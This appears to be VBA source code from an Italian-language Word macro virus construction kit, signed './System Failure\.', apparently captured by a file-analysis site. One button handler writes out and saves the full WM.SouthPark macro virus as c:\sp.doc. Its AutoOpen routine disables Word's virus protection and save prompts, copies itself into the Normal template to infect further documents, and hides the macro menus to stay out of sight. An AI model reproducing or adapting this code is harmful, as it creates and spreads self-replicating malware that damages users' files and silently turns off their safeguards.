MsgBox "Selezionare il metodo di infezione Exp-Imp /StringCopy e una delle Funzioni", vbInformation, "./System Failure\."
MsgBox "Selezionare il metodo di Polimorfismo", vbInformation, "./System Failure\."
MsgBox "Selezionare il Payload ", vbInformation, "./System Failure\."
MsgBox "Selezionare il modo (in grassetto) e un solo evento (sottostante il modo) ", vbInformation, "./System Failure\."
MsgBox "Quando le schede sono state compilate creare il virus", vbInformation, "./System Failure\."
End Sub


Private Sub CommandButton4_Click()
ok = MsgBox("Creare una copia di WM.SouthPark?", vbOKCancel, "/.System Failure\.")
If ok = vbOK Then
Open "C:\Southpark.bas" For Output As #1
Print #1, "Attribute VB_Name = ""SouthPark"""
Print #1, "This program is for educational purpose only."
Print #1, "I take no responsabiliy for any damage caused for"
Print #1, "the files created whit this program to anything."
Print #1, "Sub AutoOpen()"
Print #1, "On Error Resume Next"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "iMacroCount = NormalTemplate.VBProject.VBComponents.Count"
Print #1, "For i = 1 To iMacroCount"
Print #1, "If NormalTemplate.VBProject.VBComponents(i).Name = ""SouthPark"" Then"
Print #1, "SouthInstalled = -1"
Print #1, "End If"
Print #1, "Next i"
Print #1, "If Not SouthInstalled Then"
Print #1, "Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=""SouthPark"", Object:=wdOrganizerObjectProjectItems"
Print #1, "End If"
Print #1, "Call Datex"
Print #1, "Call StealthRoutine"
Print #1, "End Sub"
Print #1, "Sub StealthRoutine()"
Print #1, "CommandBars(""Tools"").Controls(""Macro"").Visible = False"
Print #1, "CommandBars(""Tools"").Controls(""Templates and Add-Ins..."").Visible = False"
Print #1, "Options.VirusProtection = False"
Print #1, "Options.SaveNormalPrompt = False"
Print #1, "End Sub"
Print #1, "Sub Datex()"
Print #1, "If Day(Now) = 3 Then"
Print #1, "MsgBox ""Hello!!I 'm STAN! I went from SouthParK!!"", vbInformation, ""./System Failure\."""
Print #1, "End Sub"
Print #1, "Sub ToolsMacro()"
Print #1, "End Sub"
Print #1, "Sub FileTemplate"
Print #1, "End Sub"
Print #1, "' Written by ./System Failure\."
Close #1
End If
Documents.Add
ActiveDocument.VBProject.VBComponents.Import ("C:\Southpark.bas")
ActiveDocument.SaveAs FileName:="c:\Sp", FileFormat:=wdFormatDocument
ActiveDocument.Close
MsgBox "Virus Salvato nel Documento c:\sp.doc", vbInformation, "./System Failure\."
Kill "c:\x.bas"
End Sub

Private Sub MultiPage1_Change()

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.